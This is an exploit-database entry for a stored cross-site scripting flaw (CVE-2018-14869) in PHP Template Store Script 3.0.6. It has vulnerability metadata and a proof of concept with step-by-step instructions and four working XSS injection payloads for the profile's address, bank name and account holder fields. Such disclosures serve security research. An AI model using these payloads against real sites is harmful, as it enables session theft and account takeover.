header-logo
Suggest Exploit
vendor:
PHP Template Store Script
by:
Sarafraz Khan
5.4
CVSS
MEDIUM
Stored XSS
79
CWE
Product Name: PHP Template Store Script
Affected Version From: 3.0.6
Affected Version To: 3.0.6
Patch Exists: YES
Related CWE: CVE-2018-14869
CPE: a:phpscriptsmall:php_template_store_script
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2018

PHP Template Store Script- 3.0.6 – Stored XSS via Addres ,Bank Name,and A/c Holder Name

A stored cross-site scripting vulnerability exists in PHP Template Store Script 3.0.6. An attacker can inject malicious JavaScript code into the Address Line 1, Address Line 2, Bank Name, and A/C Holder Name fields of the Personal Information page, which will be executed when the victim views the page. This can be used to steal the victim's session cookie and take over their account.

Mitigation:

Input validation should be used to prevent malicious code from being stored in the database.
Source

Exploit-DB raw data:

*******************************************************************************************
# Exploit Title:  PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name 
# Date: 02.08.2018
# Site Titel : Exclusive Scripts
# Vendor Homepage:  https://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/
# Category: Web Application
# Version: 3.0.6
# Exploit Author: Sarafraz Khan
# Contact: https://www.facebook.com/sarfraj.khan.79
# Web:  https://goglequeens.com
# Tested on: Windows 10 -Firefox
# CVE-2018-14869
*****************************************************************************************
 
Proof of Concept:-
--------------------------
1. Go  to the  site ( http://www.server.com/ ) .
2- Click on => Login => Register => and then fill the Form and click on Register Now
3-Goto your mail and Verify it.
4-Now come back to site and Sign in  using your  Verified mail and Password.
5-Goto Setting => Personal information  and paste these code in 
    Address line 1 =>         "><img src=x onerror=prompt(/SARAFRAZ/)>
    Address Line 2 =>        "><img src=x onerror=prompt(/KHAN/)>
     Bank name  =>            "><img src=x onerror=prompt(/KING/)>
    A/C Holder name =>     "><img src=x onerror=prompt(/GOOGLEQUEENS/)>

  and then click on Update Profile.

6-Now You will having popup of /SARAFRAZ/  ,  /KHAN/ , / KING/ and /GOOGLEQUEENS/  in you account..

***************************************************************************************

Navigation

Suggest Exploit

Services By CQR